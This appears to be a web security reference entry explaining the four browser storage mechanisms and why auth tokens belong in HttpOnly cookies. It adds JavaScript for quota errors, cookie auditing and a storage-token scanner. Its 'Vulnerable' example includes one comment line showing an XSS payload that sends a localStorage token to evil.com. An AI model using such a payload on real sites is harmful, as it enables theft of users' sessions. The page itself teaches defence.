Web Storage, IndexedDB & Cookies
Also Known As
localStorage
sessionStorage
IndexedDB
cookies
TL;DR
Four client-side storage mechanisms: localStorage (persistent key-value), sessionStorage (tab-scoped key-value), IndexedDB (structured, queryable, large) and cookies (sent to the server on every matching request). Only cookies can be hidden from page script (HttpOnly), so session and auth tokens belong in HttpOnly cookies, never in Web Storage or IndexedDB.
Explanation
localStorage: synchronous, string values only, roughly 5 MB per origin (browser-dependent), persists until cleared, scoped to the origin (scheme + host + port).
sessionStorage: same API, scoped to one tab or window; survives reloads but is cleared when that tab closes and is not shared with other tabs.
IndexedDB: asynchronous, transactional, stores structured objects and binary data, quotas of hundreds of MB or more, queryable through indexes; use it for offline apps and large datasets.
Cookies: at most about 4 KB each, attached by the browser to every HTTP request matching their Domain and Path, so the server can read them (session management); controlled by the Secure, HttpOnly and SameSite attributes.
Web Storage and IndexedDB are never sent to the server and are always readable by any script running on the origin. Cookies marked HttpOnly cannot be read by script, which stops an XSS payload from exfiltrating the token; the injected script can still issue same-origin requests that carry the cookie for as long as the page runs, so HttpOnly limits the damage rather than replacing an XSS fix. SameSite additionally limits cross-site requests (CSRF). Never store sensitive data (tokens, PII) in localStorage, sessionStorage or IndexedDB: one XSS reads all of it.
Common Misconception
✗ localStorage is fine for storing auth tokens — localStorage is accessible to any JavaScript on the page; XSS can exfiltrate tokens. Use HttpOnly cookies for auth tokens.
Why It Matters
Storing JWT or session tokens in localStorage turns any XSS into credential theft: a single injected script reads every key and exfiltrates the tokens, which then work from the attacker's machine until they expire. HttpOnly cookies cannot be read by JavaScript, so the token itself cannot leave the browser; the attacker is reduced to riding the session from inside the compromised page, which ends when the page does and is constrained by SameSite and CSRF defences.
Common Mistakes
- Storing auth tokens in localStorage — XSS vulnerable; use HttpOnly cookies.
- Synchronous localStorage in performance-critical loops — localStorage reads/writes are synchronous and block the main thread.
- Not handling QuotaExceededError — localStorage throws when full; catch the error.
- Sensitive data in sessionStorage — also readable by JavaScript; same XSS risk as localStorage.
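The QuotaExceededError item above is easy to get wrong because browsers report the condition differently. The following is an added example, not code from the original page: a wrapper that treats a full store as a normal outcome, plus a probe for environments where Web Storage exists but has a zero quota. `FakeStorage` is a constructed in-memory stand-in with a byte quota so the code runs under Node; in a browser you would pass `window.localStorage` instead.

```javascript
// Constructed stand-in for window.localStorage with a byte quota, so the
// example runs outside a browser and can force the quota error on demand.
class FakeStorage {
  constructor(quotaBytes) {
    this.quotaBytes = quotaBytes;
    this.map = new Map();
  }
  usedBytes() {
    let n = 0;
    for (const [k, v] of this.map) n += k.length + v.length;
    return n;
  }
  getItem(key) {
    return this.map.has(key) ? this.map.get(key) : null;
  }
  setItem(key, value) {
    const v = String(value);
    const existing = this.map.has(key) ? key.length + this.map.get(key).length : 0;
    if (this.usedBytes() - existing + key.length + v.length > this.quotaBytes) {
      const err = new Error('The quota has been exceeded.');
      err.name = 'QuotaExceededError'; // the name modern browsers use
      throw err;
    }
    this.map.set(key, v);
  }
  removeItem(key) {
    this.map.delete(key);
  }
}

// Browsers disagree on how the quota error surfaces: a DOMException named
// QuotaExceededError today, NS_ERROR_DOM_QUOTA_REACHED in older Firefox, and
// legacy numeric codes (22 in WebKit/Blink, 1014 in Firefox).
function isQuotaError(err) {
  if (!err || typeof err !== 'object') return false;
  return err.name === 'QuotaExceededError' ||
    err.name === 'NS_ERROR_DOM_QUOTA_REACHED' ||
    err.code === 22 || err.code === 1014;
}

// Returns true when the value was stored, false when the store is full (the
// caller continues without persistence). Any other error is rethrown, since
// it signals a real bug rather than an expected environmental limit.
function safeSetItem(storage, key, value) {
  try {
    storage.setItem(key, value);
    return true;
  } catch (err) {
    if (isQuotaError(err)) return false;
    throw err;
  }
}

// Some private-browsing modes and hardened profiles expose Web Storage with
// a quota of zero: a single write/remove probe tells you whether anything
// will persist at all, so the app can fall back to memory from the start.
function storageAvailable(storage) {
  const probe = '__storage_probe__';
  if (!safeSetItem(storage, probe, '1')) return false;
  storage.removeItem(probe);
  return true;
}

function demo() {
  const ls = new FakeStorage(64); // constructed: tiny quota to force the error
  const ok = safeSetItem(ls, 'theme', 'dark');           // fits
  const full = safeSetItem(ls, 'cache', 'x'.repeat(200)); // exceeds quota, no throw
  return {
    ok,
    full,
    available: storageAvailable(ls),
    zeroQuota: storageAvailable(new FakeStorage(0)),
  };
}
```

The wrapper deliberately does not retry by evicting other keys: which entries are safe to drop is an application decision, and silently discarding data is worse than reporting that the write did not persist.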
Code Examples
✗ Vulnerable
// Auth token in localStorage — XSS can steal it:
localStorage.setItem('auth_token', response.token);
// Every fetch:
fetch('/api/data', {
headers: { Authorization: 'Bearer ' + localStorage.getItem('auth_token') }
});
// Attacker XSS: fetch('https://evil.com/?t=' + localStorage.getItem('auth_token'))
✓ Fixed
// Auth token in an HttpOnly cookie: JS cannot read it.
// Server sets it on login (an HTTP response header, not JavaScript):
//   Set-Cookie: auth_token=...; HttpOnly; Secure; SameSite=Strict; Path=/
// The browser attaches the cookie itself; script never handles the token:
fetch('/api/data'); // same-origin: cookies are sent by default
fetch('/api/data', { credentials: 'include' }); // only needed for cross-origin calls, and the server must allow it via CORS
// Attacker XSS cannot read the cookie (HttpOnly), so the token cannot be exfiltrated.
// An injected script can still call /api/data as the user while the page is open, so the XSS itself must still be fixed.
// localStorage for non-sensitive UI state only:
localStorage.setItem('theme', 'dark'); // Fine: not sensitive
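Whether the fixed Set-Cookie line above actually shipped is something you can check from a response capture. This is an added example, not code from the original page: a small parser for Set-Cookie headers and an audit that flags session-bearing cookies missing the attributes the fix relies on. The header strings and the `SENSITIVE_NAME` pattern are constructed for the example; tune the pattern to your application's cookie names.

```javascript
// Parse one Set-Cookie header value into name, value and a lower-cased
// attribute map. Valueless attributes (HttpOnly, Secure) become `true`.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = {
    name: eq === -1 ? pair : pair.slice(0, eq),
    value: eq === -1 ? '' : pair.slice(eq + 1),
    attrs: {},
  };
  for (const a of attrs) {
    if (!a) continue;
    const i = a.indexOf('=');
    const k = (i === -1 ? a : a.slice(0, i)).toLowerCase();
    cookie.attrs[k] = i === -1 ? true : a.slice(i + 1);
  }
  return cookie;
}

// Assumption for the example: cookie names that suggest a session or auth
// token. Non-matching cookies (theme, locale) are not audited.
const SENSITIVE_NAME = /(session|token|auth|jwt|sid)/i;

function auditSetCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!SENSITIVE_NAME.test(c.name)) return { name: c.name, findings };

  if (!c.attrs.httponly) findings.push('missing HttpOnly: readable by injected script');
  if (!c.attrs.secure) findings.push('missing Secure: sent over plaintext HTTP');

  const ss = typeof c.attrs.samesite === 'string' ? c.attrs.samesite.toLowerCase() : null;
  if (!ss) {
    findings.push('missing SameSite: browser default varies, set Lax or Strict explicitly');
  } else if (ss === 'none' && !c.attrs.secure) {
    // The SameSite=None + Secure pairing is mandatory; browsers drop the cookie otherwise.
    findings.push('SameSite=None requires Secure; modern browsers reject this cookie');
  }
  if (typeof c.attrs.domain === 'string') {
    findings.push('Domain set: cookie is shared with every subdomain of ' + c.attrs.domain);
  }
  return { name: c.name, findings };
}

// Constructed headers: the page's fixed cookie, a weak variant, and a
// SameSite=None cookie that forgot Secure.
const GOOD_HEADER = 'auth_token=...; HttpOnly; Secure; SameSite=Strict; Path=/';
const WEAK_HEADER = 'auth_token=abc; Path=/';
const NONE_WITHOUT_SECURE = 'sid=abc; HttpOnly; SameSite=None';
const HARMLESS_HEADER = 'theme=dark; Path=/';
```

Run `auditSetCookie` over every Set-Cookie header in a login response (a proxy log or an integration test is the natural place); an empty `findings` array for the session cookie is the pass condition.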
Added
15 Mar 2026
Edited
22 Mar 2026
Related categories
⚡
DEV INTEL
Tools & Severity
🟠 High
⚙ Fix effort: Low
⚡ Quick Fix
Use sessionStorage for temporary per-tab data, localStorage for persistent preferences, IndexedDB for large structured data; never store tokens or sensitive data in any of these. Keep session and auth tokens in cookies set with HttpOnly, Secure and SameSite.
📦 Applies To
javascript HTML5
web
🔍 Detection Hints
JWT or session token written to localStorage or sessionStorage (look for setItem calls whose key names a token, session or credential); sensitive PII stored client-side unencrypted
Auto-detectable:
✓ Yes
semgrep
eslint
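The detection hint above is what a semgrep or eslint rule for this page's problem encodes. As an added example, not the page's own tooling and not an actual rule from either tool, here is a line-oriented scanner showing the pattern: literal keys that name a token are reported with high confidence, dynamic keys are flagged for review, which is where the medium false-positive rate of such rules comes from. `SAMPLE_SOURCE` and the `SENSITIVE_KEY` pattern are constructed for the example.

```javascript
// Matches `localStorage.setItem(<first arg>,` and `sessionStorage.setItem(<first arg>,`
// including `window.localStorage...`; captures the storage object and the key expression.
const SETITEM_CALL = /\b(localStorage|sessionStorage)\s*\.\s*setItem\s*\(\s*([^,]+?)\s*,/;
const STRING_LITERAL = /^(['"`])(.*)\1$/;
// Assumption for the example: key names that suggest a credential or identifier.
const SENSITIVE_KEY = /(token|jwt|auth|session|sid|password|secret|ssn)/i;

function scanSource(source) {
  const findings = [];
  source.split('\n').forEach((line, i) => {
    const call = SETITEM_CALL.exec(line);
    if (!call) return;
    const [, storage, keyExpr] = call;
    const lit = STRING_LITERAL.exec(keyExpr);
    if (lit) {
      // Literal key: the rule can decide on its own.
      if (SENSITIVE_KEY.test(lit[2])) {
        findings.push({ line: i + 1, storage, key: lit[2], confidence: 'high', cwe: 'CWE-922' });
      }
    } else {
      // Dynamic key: the line alone cannot tell what is stored, so flag for
      // manual review instead of silently passing it.
      findings.push({ line: i + 1, storage, key: keyExpr, confidence: 'review', cwe: 'CWE-922' });
    }
  });
  return findings;
}

// Constructed source lines covering the cases the rule must distinguish.
const SAMPLE_SOURCE = [
  "localStorage.setItem('auth_token', response.token);", // high
  'sessionStorage.setItem("jwt", jwt);',                  // high
  "localStorage.setItem('theme', 'dark');",               // clean
  'localStorage.setItem(key, JSON.stringify(value));',    // dynamic key: review
  "window.localStorage.setItem('sessionId', id);",        // high
].join('\n');

function demoScan() {
  return scanSource(SAMPLE_SOURCE);
}
```

A real rule also needs to cover `storage['auth_token'] = ...` and `storage.auth_token = ...` assignments and helper wrappers around setItem; a data-flow aware tool does that, a regex does not, which is why the page marks manual fixing and medium confidence.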
🤖 AI Agent
Confidence: Medium
False Positives: Medium
✗ Manual fix
Fix: Medium
Context: File
CWE-312: Cleartext Storage of Sensitive Information
CWE-922: Insecure Storage of Sensitive Information